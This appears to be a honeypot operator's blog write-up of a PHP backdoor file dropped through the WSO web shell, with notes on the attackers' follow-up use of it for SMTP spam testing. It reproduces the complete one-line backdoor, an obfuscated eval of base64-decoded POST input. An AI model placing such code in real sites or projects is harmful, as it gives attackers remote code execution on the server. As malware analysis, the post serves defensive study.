7c334.php: World's Simplest Backdoor
Another WSO download, 7c334.php consists entirely of the following:
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}^M
?>
This is only slight obfuscated, but it has the advantage of not leaving on disk a copy of the malicious PHP, the PHP executed by the eval(base64_decode(...)). Note that it only works correctly with HTTP POST requests, and further, requests with a parameter named code and an associated value.
91.197.19.103 uploaded the backdoor code 6 times between 2013-07-03T04:40:15-06 and 2013-07-03T04:49:38-06. On 2013-07-16T13:57:04-06, 91.197.19.103 tried to delete the backdoor code via the "Php" action of WSO. The PHP deletion code arrives in a HTTP POST request, and WSO executes it via the eval() construct. The code is thorough, it starts at "/" and works its way down the filesystem until it finds 7c334.php and unlinks it. The code is specific to Linux, but that may not mean anything. WSO tells you what operating system it's running on, so you could send a Linux-specific version to Linux systems, and a Windows-specific version to Windows. If the deletion code executes successfully, the result is the phrase "eval_ok". I did not emulate the "Php" action in WSO, so this chunk of code just got saved, and did not return "eval_ok". It does seem that not leaving a trace on disk is a priority to the people installing and using this backdoor.
Eight different IP addresses (none of them the IP address that uploaded the gateway) tried to execute 3 distinct pieces of PHP via this backdoor.
SMTP Tester 1
Someone attempted to use the backdoor to run an STMP test. They sent an HTTP POST that got the 7c334 PHP code to eval an SMTP spamming program. The spamming program would try to send an email with the body text Validation success:#43d42cd13ec809071976366def5b135c# to 30 different SMTP addresses, mostly in the UK. The eval'ed code is clearly a spamming tool, as it allows for multiple destination addresses for the message body, fakes a source address, and picks a random string as a fake mail user agent name. In this case, it was used for reconnaisance.
The POST requests for 7c334.php that contain the SMTP tester code also contain name/value pairs used by the tetser code when it executes. The name/value pairs include the "from" email address, a list of "to" email addresses, a message body, and a subject line. All of the values are base64-encoded, but the names ("theme", "message", "from", "emails", "mailers") are not. The name/value pairs include a "verbose" name and corrsponding value, which is never used. Several functions (text_macros(), alter_macros(), xnum_macros()) appear, but are never called. All this lends a slapdash feel to the code, as if someone created this code by stripping down a larger program, but didn't quite finish the job.
SMTP Tester 2
The eval'ed code for this SMTP tester is mostly the open source PHPMailer class. It looks like a concatenation of class.smtp.php, class.html2text.inc and class.phpmailer.php from the source code of that project, with all comments stripped. Various $Version variables place it at version 5.2.6 of PHPMailer.
PHPMailer is overkill for what this tester does: contact smtp.gmail.com and try SMTP "EHLO" and "HELO" commands. Only a very few PHPMailer member functions get called. On the other hand, the tester code does try TCP ports 25, 465 and 587, keeping up the grand tradition of malware trying every difficult operation multiple times.
Just give me some output, any output!
echo "sadfasdfasdfasdf";
The "echo" code was the last time someone tried to execute something on my honey pot via 7c334.php. It may constitute a manual attempt at figuring out what was going wrong, since my 7c334 emulation didn't actually eval any PHP sent its way.